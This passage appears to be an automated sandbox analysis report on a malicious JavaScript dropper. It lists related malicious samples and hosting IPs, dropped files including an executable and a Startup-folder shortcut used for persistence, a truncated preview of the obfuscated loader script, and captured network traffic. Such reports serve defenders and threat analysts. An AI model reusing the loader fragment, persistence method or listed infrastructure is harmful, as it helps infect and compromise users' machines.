                                              • 204.11.56.48
                                              7IEK8G8P67.jsGet hashmaliciousBrowse
                                              • 204.11.56.48
                                              emwkvlhvf.jsGet hashmaliciousBrowse
                                              • 104.27.154.55
                                              emwkvlhvf.jsGet hashmaliciousBrowse
                                              • 104.27.155.55
                                              vrswuyr.jsGet hashmaliciousBrowse
                                              • 104.27.155.55
                                              vrswuyr.jsGet hashmaliciousBrowse
                                              • 104.27.154.55
                                              test.jsGet hashmaliciousBrowse
                                              • 104.27.154.55
                                              test.jsGet hashmaliciousBrowse
                                              • 104.27.154.55
                                              qrlyyqnmy.jsGet hashmaliciousBrowse
                                              • 104.27.155.55
                                              qrlyyqnmy.jsGet hashmaliciousBrowse
                                              • 104.27.155.55
                                              biqodvu.jsGet hashmaliciousBrowse
                                              • 104.18.40.101
                                              biqodvu.jsGet hashmaliciousBrowse
                                              • 104.18.40.101
                                              diboj.jsGet hashmaliciousBrowse
                                              • 104.27.155.55
                                              diboj.jsGet hashmaliciousBrowse
                                              • 104.27.155.55
                                              ajwngsj.jsGet hashmaliciousBrowse
                                              • 104.27.154.55
                                              ajwngsj.jsGet hashmaliciousBrowse
                                              • 104.27.154.55
                                              nbmvwchp.jsGet hashmaliciousBrowse
                                              • 104.27.154.55
                                              nbmvwchp.jsGet hashmaliciousBrowse
                                              • 104.27.155.55

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              CONFLUENCE-NETWORK-INCVGCHANG 290386.exeGet hashmaliciousBrowse
                                              • 209.99.40.222
                                              PO #6093245.exeGet hashmaliciousBrowse
                                              • 204.11.56.48
                                              orii11.exeGet hashmaliciousBrowse
                                              • 209.99.40.222
                                              orii11.exeGet hashmaliciousBrowse
                                              • 208.91.197.91
                                              bnb.exeGet hashmaliciousBrowse
                                              • 208.91.197.91
                                              nova proforma.exeGet hashmaliciousBrowse
                                              • 209.99.64.33
                                              Grupo Dani New Inquiry Order.exeGet hashmaliciousBrowse
                                              • 208.91.197.91
                                              yCWzTRmMP4.exeGet hashmaliciousBrowse
                                              • 209.99.40.222
                                              SWIFT Ref F607163435808987.xlsxGet hashmaliciousBrowse
                                              • 208.91.197.27
                                              P87k5f5ecn.exeGet hashmaliciousBrowse
                                              • 208.91.197.27
                                              Receipt.xlsxGet hashmaliciousBrowse
                                              • 208.91.197.27
                                              FileZilla_3.50.0_win32-setup.exeGet hashmaliciousBrowse
                                              • 204.11.56.48
                                              FileZilla_3.50.0_win64-setup.exeGet hashmaliciousBrowse
                                              • 204.11.56.48
                                              FqDxzuy8tK.exeGet hashmaliciousBrowse
                                              • 208.91.196.145
                                              20210303948387477467,pdf.exeGet hashmaliciousBrowse
                                              • 208.91.197.27
                                              ord.xlsxGet hashmaliciousBrowse
                                              • 209.99.40.222
                                              Purchase Order.exeGet hashmaliciousBrowse
                                              • 208.91.197.91
                                              PO_98276300.exeGet hashmaliciousBrowse
                                              • 208.91.197.91
                                              tqzZKX6qsT.exeGet hashmaliciousBrowse
                                              • 208.91.197.27
                                              iQnbU4o7yx.exeGet hashmaliciousBrowse
                                              • 208.91.196.46
                                              LIQUIDWEBUSSecuriteInfo.com.VB.Heur2.EmoDldr.16.C2C1C6E0.Gen.19261.xlsmGet hashmaliciousBrowse
                                              • 67.227.251.48
                                              file.docGet hashmaliciousBrowse
                                              • 67.227.152.97
                                              N6Ej6HEuQt.exeGet hashmaliciousBrowse
                                              • 67.225.164.116
                                              Payslip 3-3-pdf.exeGet hashmaliciousBrowse
                                              • 69.16.200.142
                                              Statement_of_Account_as_of_mar_01_2021.xlsmGet hashmaliciousBrowse
                                              • 67.227.237.109
                                              Complaint_Letter_1195372013-02192021.xlsGet hashmaliciousBrowse
                                              • 72.52.229.105
                                              o1N0Ej5dP0.exeGet hashmaliciousBrowse
                                              • 72.52.168.184
                                              BL.htmlGet hashmaliciousBrowse
                                              • 67.225.226.82
                                              BL.htmlGet hashmaliciousBrowse
                                              • 67.225.226.82
                                              diskdrill.dmgGet hashmaliciousBrowse
                                              • 67.225.176.50
                                              dgaTCZovz.msiGet hashmaliciousBrowse
                                              • 67.225.133.88
                                              SecuriteInfo.com.XF.AShadow.4960.21593.xlsGet hashmaliciousBrowse
                                              • 72.52.227.180
                                              SecuriteInfo.com.XF.AShadow.4960.21593.xlsGet hashmaliciousBrowse
                                              • 72.52.227.180
                                              Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                                              • 72.52.227.180
                                              Complaint-1992179913-02182021.xlsGet hashmaliciousBrowse
                                              • 72.52.227.180
                                              Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                                              • 72.52.227.180
                                              Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                                              • 72.52.227.180
                                              SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                              • 72.52.227.180
                                              SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                                              • 72.52.227.180
                                              ENQUIRY.docGet hashmaliciousBrowse
                                              • 67.225.218.11
                                              BODIS-NJUSPO #6093245.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              1feiNnK6Qd.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              bXSINeHUUZ.dllGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              R8WWx5t2RE.dllGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              KCCAfipQl2.dllGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              Confirmaci#U00f3n de pago.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              twistercrypted.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              Order List - 022321-xlxs.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              PO_210222.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              DHL Document. PDF.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              Payment advice.xlsGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              8nxKYwJna8.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              gRd8HGFpL7.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              DHL eShipment invoice_pdf.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              bAcefnEUjb.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              Xi4vVgHekF.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              q2EKWldniJ.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              Inv_9876567.docGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              4NoiNHCNoU.exeGet hashmaliciousBrowse
                                              • 199.59.242.153
                                              mtsWWNDaNF.exeGet hashmaliciousBrowse
                                              • 199.59.242.153

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exekjymuth.jsGet hashmaliciousBrowse
                                                mitbjisfe.jsGet hashmaliciousBrowse
                                                  mitbjisfe.jsGet hashmaliciousBrowse
                                                    SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.26335.exeGet hashmaliciousBrowse
                                                      SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.14505.exeGet hashmaliciousBrowse
                                                        SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.31586.exeGet hashmaliciousBrowse
                                                          Q38V8rfI5H.jsGet hashmaliciousBrowse
                                                            Q38V8rfI5H.jsGet hashmaliciousBrowse
                                                              Z4VzMe8IqZ.jsGet hashmaliciousBrowse
                                                                Z4VzMe8IqZ.jsGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Variant.Bulz.247339.1677.exeGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Variant.Bulz.247339.23255.exeGet hashmaliciousBrowse
                                                                      CiNPLUJX3z.exeGet hashmaliciousBrowse
                                                                        56HMUThTRj.exeGet hashmaliciousBrowse
                                                                          7IEK8G8P67.jsGet hashmaliciousBrowse
                                                                            7IEK8G8P67.jsGet hashmaliciousBrowse
                                                                              msS0Lp8xag.jsGet hashmaliciousBrowse
                                                                                msS0Lp8xag.jsGet hashmaliciousBrowse
                                                                                  ookvfbv.jsGet hashmaliciousBrowse
                                                                                    emwkvlhvf.jsGet hashmaliciousBrowse

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):163840
                                                                                      Entropy (8bit):5.729539450068024
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:8HSpBlnak9UH8bCAHZ1LQ434syPz7M5hh/kzhwS827HuYHwHugXEYJ6S7775MWUn:aC4HWCp/fM5hvNebgXEYJN73uWUZxtt
                                                                                      MD5:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                                      SHA1:2661E5F3562DD03C0ED21C33E2888E2FD1137D8C
                                                                                      SHA-256:62A95C926C8513C9F3ACF65A5B33CBB88174555E2759C1B52DD6629F743A59ED
                                                                                      SHA-512:156CAED6E1BF27B275E4BA0707FB550F1BF347A26361D6D3CAD12C612C327686950B47B6C5487110CF8B35A490FAADC812ADE3777FFF7ED76A528D970914A6E0
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: kjymuth.js, Detection: malicious, Browse
                                                                                      • Filename: mitbjisfe.js, Detection: malicious, Browse
                                                                                      • Filename: mitbjisfe.js, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.26335.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.14505.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.widgetinfect#U00e9.Gen.Variant.Bulz.313019.31586.exe, Detection: malicious, Browse
                                                                                      • Filename: Q38V8rfI5H.js, Detection: malicious, Browse
                                                                                      • Filename: Q38V8rfI5H.js, Detection: malicious, Browse
                                                                                      • Filename: Z4VzMe8IqZ.js, Detection: malicious, Browse
                                                                                      • Filename: Z4VzMe8IqZ.js, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.Variant.Bulz.247339.1677.exe, Detection: malicious, Browse
                                                                                      • Filename: SecuriteInfo.com.Variant.Bulz.247339.23255.exe, Detection: malicious, Browse
                                                                                      • Filename: CiNPLUJX3z.exe, Detection: malicious, Browse
                                                                                      • Filename: 56HMUThTRj.exe, Detection: malicious, Browse
                                                                                      • Filename: 7IEK8G8P67.js, Detection: malicious, Browse
                                                                                      • Filename: 7IEK8G8P67.js, Detection: malicious, Browse
                                                                                      • Filename: msS0Lp8xag.js, Detection: malicious, Browse
                                                                                      • Filename: msS0Lp8xag.js, Detection: malicious, Browse
                                                                                      • Filename: ookvfbv.js, Detection: malicious, Browse
                                                                                      • Filename: emwkvlhvf.js, Detection: malicious, Browse
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................................n.........Rich...................PE..d....U.E.........."......2...R......@*.........@....................................8w....`.............................................8...8...................................T.......T..........................................................................text..."1.......2.................. ..`.rdata..F....P.......6..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..T............t..............@..B........................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Local\nsoerwoel\nguvmqit
                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines
                                                                                      Category:dropped
                                                                                      Size (bytes):4089
                                                                                      Entropy (8bit):5.748750516302002
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:jioOJIZRGKv7gErecdUB2BuUQmvabn/Otk8MownOC+9mBRQs:jioAWYakkhBXQHgMZnOCLRQs
                                                                                      MD5:72303BB2A0685E1DC2EBBEF69DDE0528
                                                                                      SHA1:87D3BC1FB5B205E453D5D2E3418D01791B6A50EF
                                                                                      SHA-256:03714A6F6271C3A3D13BFB7996B2E77E11B2C94E28DF31FBAEF5FF68E1C020C2
                                                                                      SHA-512:D5BE79F4203560D65D0DCE5DDCC56C2F93439E6F5E4C4E415A609DDA43A74AFCA08FA7DC37EAA6F96BCA3D632C8FEE44632437444E3286406224FC05561EC3F6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_qX8bODRC2aDPzt6IJCBwajHFDKXIjBHNiK15Ot4+5udkO7djbo9ZURb/sUD4YMghK5Pa+ZC4aBjYsbZiG0uXQQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head> [if IE 6 ]><body class="ie6"><![endif]--> [if IE 7 ]><body class="ie7"><![endif]--> [if IE 8 ]><body class="ie8"><![endif]--> [if IE 9 ]><body class="ie9"><![endif]--> [if (gt IE 9)|!(IE)]> --><body> <![endif]--><script type="text/javascript">g_pb=(function(){var.DT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.onerror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onlo
                                                                                      C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js
                                                                                      Process:C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
                                                                                      File Type:ISO-8859 text, with very long lines, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):15523
                                                                                      Entropy (8bit):5.9174539625971585
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:RANdk8H6Hh7WZ+wevLYz7GzPMSs/OdhOGh97XbSV032q0:WN1H6Hh7WZ+/jcG/s/Odhb7XbG032Z
                                                                                      MD5:E43E6029BB62780558539D8F052D3EAA
                                                                                      SHA1:41AA8EDAC913960793F6CDF0A27F0A64B8260E6F
                                                                                      SHA-256:D9CC91FF8D5472CE7224C773927E03CF44A11B5F452E6C65FA9899068ED1F6B7
                                                                                      SHA-512:D6DD16C4C93B2A2B3D1035989B46BD0C87C9162E54754D8D43359546B4EA3AE77AC12E3FFC1B0AF8FD098CBE3FB681A2C3900AB2B6FC09C448AB48DFA939292B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview: var a=",{y$g*m%r=-5 ,e($t$R$1zO$7:G670v>5&70*>5&E&AyO$7Q%~~p\"eD9C45,lm$h%{)$cX55E2E?5[~rK8P$.:I-5E&t\"iliwO~xD9H;C7K$=O]XbPA$\"m!i5Kzg!s>$Xl(s#iD:I2E2H6M6C5I45Wvjvv~3J7L2H:5Iykz3F;C5L5H87\"Pzvv5e5A5rz{5Exx~zz\\df ixx=&-wxv~t*2)lzp\"&>0w$R$$i-$Vg*m,imSwnzg*,7wxv~t*m$kCj~pzw/w*i#swnzg*&>0}$R${y$g*m%r=-5 (i*y(r5,=55/5Qvx}2(e$h%q=->$?$K9J7K$2$E-Cx%W*v~r|,F:>2)yww*v~r|,F-30y$R$v2zr,m(s$qzr*,7t(sxi)w7-Aj5A5h=&+wzv$e#i7-Ak5A5h=&xs#t+xzv$e#i7-Av+$R$$i-$Vg*m,imSwnzg*,7w}i\"pCe&t\"mxe*m%r7-Ap%$R$paAj+t5A5_r0ysy$R$7&Ah%x5A54Al{$R${y$g*m%r=i>$1x(}5 ,e($*$R$w2|i*J%pyi(,z-PxCe*x(mwy*i)$R$G\"5gvxxl5,$-5 3\"Awx$R${y$g*m%r=i>$1i5/R$7&Pzvv5x5A54Pj%v5,,e($$$R$E?5r5@5iCpzr|x}?5r@/>$*$R$=x5@Q$J-515x5/5iCg}e(G%hzE*,$-A$*$;A5xPvzx+v$$be*lCeww=x>\"Alv$R${y$g*m%r=i>$1zvv5x5A5&70$$R$)g=i>?{s($=zvv5v5A54P$($Q$)g=i>$:$J$@$J?5v@/>$$$R$)g=x5/5r>05x5/R$hx(m$kCj(s#G}e(G%hz,$$:$G95/5=L-Pvzx+v$$*\"Pzvv5~0s5A5j+rxx~s$,>$1zvv5x*{5A5_7l*x&>D3-{-2#mxv%w%j*2xs#3705&}x*tO3D{-{Ck%s|pz2xs#3705&}x*tO3D{-{Cf~r|2xs#37aPj%v5,,e($
                                                                                      C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js:Zone.Identifier
                                                                                      Process:C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                                      C:\Users\user\AppData\Local\nsoerwoel\qihyo
                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):36
                                                                                      Entropy (8bit):3.517593238793311
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:TX2wI+6LYXTHVr:b2wItL6L1
                                                                                      MD5:523A50742457815E56AAD125EC0E53DE
                                                                                      SHA1:5C022557169294028FC87A9DC55EC27B5D74693D
                                                                                      SHA-256:EC0641018EDE331A8DC2CF30A949210BF1D5F5D0467EDB250F1D375834B5B41B
                                                                                      SHA-512:E8DEE72B4EEF08174530D8C592A8AEDBD43A05722E6F5FB7914E26134106FBA70E4F297009D40C9A5B5F0C34B1E76E93D3C0CDECECA8C4939C1BB565995128CA
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview: 87c21515-2966-a2aa-6b2b-26b01846040a
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ttdwagotd.lnk
                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=3, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1104
                                                                                      Entropy (8bit):3.1740206332378995
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:81+f4eaRb1lgrol57NFLolaUo0f9HAv7aB:8bZRb1uro77NFLotouAOB
                                                                                      MD5:A6F2722FD7B40FA39CAEE142E5C3E52C
                                                                                      SHA1:03F042E79B7A75CF93DD2163EF5BC43069C05FA3
                                                                                      SHA-256:C125C49DC745E74A8F7A9E92222E966F972E8CBCB30D47F062CCACDB2713D606
                                                                                      SHA-512:AB026F4BE515180D3467E390649CE5C87F585546C89727DE7E6774483616B4B8BDF21E29856571DA973E91EE91AD091D0E8D2678CD6FFD106DCFC1CFD48BDAED
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview: L..................F........................................................3....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................h.a.r.d.z.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....\.1...........nsoerwoel.D............................................n.s.o.e.r.w.o.e.l.....b.2...........ibfmvoj.exe.H............................................i.b.f.m.v.o.j...e.x.e.......-.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.n.s.o.e.r.w.o.e.l.\.i.b.f.m.v.o.j...e.x.e.2.".C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.n.s.o.e.r.w.o.e.l.\.p.f.u.r.y.r...j.s.".!.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:ISO-8859 text, with very long lines, with no line terminators
                                                                                      Entropy (8bit):5.9174539625971585
                                                                                      TrID:
                                                                                      • Java Script (8504/1) 100.00%
                                                                                      File name:xPUqa4qbDL.js
                                                                                      File size:15523
                                                                                      MD5:e43e6029bb62780558539d8f052d3eaa
                                                                                      SHA1:41aa8edac913960793f6cdf0a27f0a64b8260e6f
                                                                                      SHA256:d9cc91ff8d5472ce7224c773927e03cf44a11b5f452e6c65fa9899068ed1f6b7
                                                                                      SHA512:d6dd16c4c93b2a2b3d1035989b46bd0c87c9162e54754d8d43359546b4ea3ae77ac12e3ffc1b0af8fd098cbe3fb681a2c3900ab2b6fc09c448ab48dfa939292b
                                                                                      SSDEEP:384:RANdk8H6Hh7WZ+wevLYz7GzPMSs/OdhOGh97XbSV032q0:WN1H6Hh7WZ+/jcG/s/Odhb7XbG032Z
                                                                                      File Content Preview:var a=",{y$g*m%r=-5 ,e($t$R$1zO$7:G670v>5&70*>5&E&AyO$7Q%~~p\"eD9C45,lm$h%{)$cX55E2E?5[~rK8P$.:I-5E&t\"iliwO~xD9H;C7K$=O]XbPA$\"m!i5Kzg!s>$Xl(s#iD:I2E2H6M6C5I45Wvjvv~3J7L2H:5Iykz3F;C5L5H87\"Pzvv5e5A5rz{5Exx~zz\\df ixx=&-wxv~t*2)lzp\"&>0w$R$$i-$Vg*m,imSwnz

                                                                                      File Icon

                                                                                      Icon Hash:e8d69ece968a9ec4

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Mar 10, 2021 07:01:37.288393974 CET4970280192.168.2.3204.11.56.48
                                                                                      Mar 10, 2021 07:01:37.462424994 CET8049702204.11.56.48192.168.2.3
                                                                                      Mar 10, 2021 07:01:37.462594032 CET4970280192.168.2.3204.11.56.48
                                                                                      Mar 10, 2021 07:01:37.463186979 CET4970280192.168.2.3204.11.56.48
                                                                                      Mar 10, 2021 07:01:37.635301113 CET8049702204.11.56.48192.168.2.3
                                                                                      Mar 10, 2021 07:01:37.726541996 CET4970380192.168.2.372.52.178.23
                                                                                      Mar 10, 2021 07:01:37.884529114 CET804970372.52.178.23192.168.2.3
                                                                                      Mar 10, 2021 07:01:37.885545969 CET4970380192.168.2.372.52.178.23
                                                                                      Mar 10, 2021 07:01:37.885823011 CET4970380192.168.2.372.52.178.23
                                                                                      Mar 10, 2021 07:01:38.043828964 CET804970372.52.178.23192.168.2.3
                                                                                      Mar 10, 2021 07:01:38.240365028 CET804970372.52.178.23192.168.2.3
                                                                                      Mar 10, 2021 07:01:38.303832054 CET4970380192.168.2.372.52.178.23
                                                                                      Mar 10, 2021 07:01:38.314975023 CET4970480192.168.2.3199.59.242.153
                                                                                      Mar 10, 2021 07:01:38.435937881 CET8049704199.59.242.153192.168.2.3
                                                                                      Mar 10, 2021 07:01:38.436131954 CET4970480192.168.2.3199.59.242.153
                                                                                      Mar 10, 2021 07:01:38.436440945 CET4970480192.168.2.3199.59.242.153
                                                                                      Mar 10, 2021 07:01:38.557413101 CET8049704199.59.242.153192.168.2.3
                                                                                      Mar 10, 2021 07:01:38.557725906 CET8049704199.59.242.153192.168.2.3
                                                                                      Mar 10, 2021 07:01:38.557766914 CET8049704199.59.242.153192.168.2.3
                                                                                      Mar 10, 2021 07:01:38.557806015 CET8049704199.59.242.153192.168.2.3
                                                                                      Mar 10, 2021 07:01:38.557833910 CET8049704199.59.242.153192.168.2.3
                                                                                      Mar 10, 2021 07:01:38.557871103 CET8049704199.59.242.153192.168.2.3
                                                                                      Mar 10, 2021 07:01:38.557881117 CET4970480192.168.2.3199.59.242.153
                                                                                      Mar 10, 2021 07:01:38.557934046 CET4970480192.168.2.3199.59.242.153
                                                                                      Mar 10, 2021 07:01:38.694547892 CET4970480192.168.2.3199.59.242.153
                                                                                      Mar 10, 2021 07:01:51.138794899 CET804970372.52.178.23192.168.2.3
                                                                                      Mar 10, 2021 07:01:51.138955116 CET4970380192.168.2.372.52.178.23
                                                                                      Mar 10, 2021 07:01:51.143951893 CET4970380192.168.2.372.52.178.23
                                                                                      Mar 10, 2021 07:01:51.300982952 CET804970372.52.178.23192.168.2.3
                                                                                      Mar 10, 2021 07:02:08.557809114 CET8049704199.59.242.153192.168.2.3
                                                                                      Mar 10, 2021 07:02:08.557933092 CET4970480192.168.2.3199.59.242.153
                                                                                      Mar 10, 2021 07:02:08.558010101 CET4970480192.168.2.3199.59.242.153
                                                                                      Mar 10, 2021 07:02:08.678965092 CET8049704199.59.242.153192.168.2.3

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Mar 10, 2021 07:01:23.041506052 CET53586438.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:01:23.352621078 CET6098553192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:01:23.398683071 CET53609858.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:01:23.667418003 CET5020053192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:01:23.713546991 CET53502008.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:01:25.738008022 CET5128153192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:01:25.796827078 CET53512818.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:01:35.629832029 CET4919953192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:01:35.685457945 CET53491998.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:01:36.676671982 CET5062053192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:01:37.287056923 CET53506208.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:01:37.664587021 CET6493853192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:01:37.722069025 CET53649388.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:01:38.256385088 CET6015253192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:01:38.313544035 CET53601528.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:01:39.075154066 CET5754453192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:01:39.131778002 CET53575448.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:01:55.232848883 CET5598453192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:01:55.284255028 CET53559848.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:01:56.191334009 CET6418553192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:01:56.238444090 CET53641858.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:02:01.993210077 CET6511053192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:02:02.043646097 CET53651108.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:02:07.488462925 CET5836153192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:02:07.549479008 CET53583618.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:02:13.520272017 CET6349253192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:02:13.568730116 CET53634928.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:02:19.182851076 CET6083153192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:02:19.229460955 CET53608318.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:02:29.828043938 CET6010053192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:02:29.897990942 CET53601008.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:02:36.302645922 CET5319553192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:02:36.351711035 CET53531958.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:02:40.371517897 CET5014153192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:02:40.420521021 CET53501418.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:02:45.234601974 CET5302353192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:02:45.290242910 CET53530238.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:03:07.248337984 CET4956353192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:03:07.294415951 CET53495638.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:03:16.174554110 CET5135253192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:03:16.223556995 CET53513528.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:03:17.720179081 CET5934953192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:03:17.785280943 CET53593498.8.8.8192.168.2.3
                                                                                      Mar 10, 2021 07:03:39.264312983 CET5708453192.168.2.38.8.8.8
                                                                                      Mar 10, 2021 07:03:39.313106060 CET53570848.8.8.8192.168.2.3

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
